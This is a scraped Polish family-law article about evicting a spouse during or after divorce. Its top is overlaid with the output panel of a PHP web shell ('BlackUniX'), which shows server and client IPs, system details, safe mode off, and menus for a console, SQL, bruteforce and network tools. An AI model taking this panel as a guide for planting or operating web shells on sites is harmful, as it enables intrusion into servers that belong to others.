W Stronę Ojca i no co ty Tato
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut #36 SMP Thu May 19 16:53:59 CEST 2016 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-21 19:41:08
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.166.141.12
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

Czy żona może wyrzucić cię z domu?
09.05.2008.

Z reguły po rozwodzie drogi małżonków rozchodzą się. Często toczy się boje nie tylko o dzieci, ale także o mieszkanie. Na jakiej podstawie prawnej można wyrzucić współmałżonka z mieszkania. Jakie są prawa eksmitowanych? Podobne sytuacje reguluje zarówno Kodeks Rodzinny i Opiekuńczy, jak i Ustawa o ochronie praw lokatorów. Która jest ważniejsza?

Sytuacja rozwodu wiąże się z bardzo skomplikowaną kwestią mieszkania, o które często pary toczą boje. W kodeksie rodzinnym i opiekuńczym znajdujemy przepisy dotyczącej tej sprawy w Art 58.

§ 2. Jeżeli małżonkowie zajmują wspólne mieszkanie, sąd w wyroku rozwodowym orzeka także o sposobie korzystania z tego mieszkania przez czas wspólnego w nim zamieszkiwania rozwiedzionych małżonków. W wypadkach wyjątkowych, gdy jeden z małżonków swym rażąco nagannym postępowaniem uniemożliwia wspólne zamieszkiwanie, sąd może nakazać jego eksmisję na żądanie drugiego małżonka(...)

Trzeba zwrócić uwagę, że kodeks określa taką sytuację jako wyjątkową, a zachowanie współmałżonka jako rażąco naganne. Ocena należy jednak do sądu. I teoretycznie nie można wyrzuć nikogo z mieszkania bez wyroku, ani zasądzić eksmisji z byle powodu.

W § 4. prawodawca stara się zapewnić bezpieczeństwo dzieciom:

Orzekając o wspólnym mieszkaniu małżonków. sąd uwzględnia przede wszystkim potrzeby dzieci małżonka, któremu powierza wykonywanie władzy rodzicielskiej.

Tyle prawniczej teorii, w praktyce dziecko może stać się orężem w walce o mieszkanie.Jest również druga ustawa, która może przyczynić się do eksmisji: Ustawa o ochronie lokatorów:

Art. 13. (...)

2. Współlokator może wytoczyć powództwo o nakazanie przez sąd eksmisji małżonka, rozwiedzionego małżonka lub innego współlokatora tego samego lokalu, jeżeli ten swoim rażąco nagannym postępowaniem uniemożliwia wspólne zamieszkiwanie.Z pozoru przepisy te powielają się. Faktycznie są subtelne różnice. Pierwszy z nich - KRiO wskazuje na wyjątkowość sytuacji, za to ignoruje fakt, czy współmałżonek jest właścicielem mieszkania.

Natomiast w na podstawie Ustawy o ochronie lokatorów nie możemy zmusić współmałżonka do opuszczenia lokalu jeśli jest jego właścicielem.

W związku z tymi różnicami, w konkretnych sytuacjach jedna, albo druga droga może przyspieszyć eksmisję współmałżonka.

Teraz czekamy na wyrok Sądu Najwyższego, który ma rozstrzygnąć, czy mogą toczyć się jednocześnie dwie takie sprawy.

Jakie ma to praktyczne znaczenie? Proces rozwodowe wielokrotnie ciągną się latami. Dlatego małżonek, który usiłuje pozbyć się drugiego z mieszkania może bardzo długo czekać na nakaz eksmisji. W związku z tym pojawia się pytanie, czy może jeszcze w trakcie procesu rozwodowego usunąć współmałżonka na podstawie Ustawy o ochronie lokatorów?

Przy eksmisji sąd bada, czy eksmitowany ma prawo do lokalu socjalnego. Mieszkanie socjalne jest lokalem o obniżonym standardzie. I jeśli zostanie przyznany, musi go zapewnić gmina.

Przy braku lokalu zastępczego wyroków eksmisji nie wykonuje się w okresie od 1 listopada do 31 marca następnego roku.

Okazuje się jednak, że powyższe ograniczenia nie dotyczą sytuacji, kiedy eksmitowany znęcał się nad rodziną (został uznany za takiego).


Źródło: Rzeczpospolita

 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Co zmieniu nowelizacja KRiO?
 
Czy opieka wspólna po rozwodzie to dobre rozwiązanie dla dziecka?
 
Czy znasz nowy kodeks rodzinny?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


21.06.2018.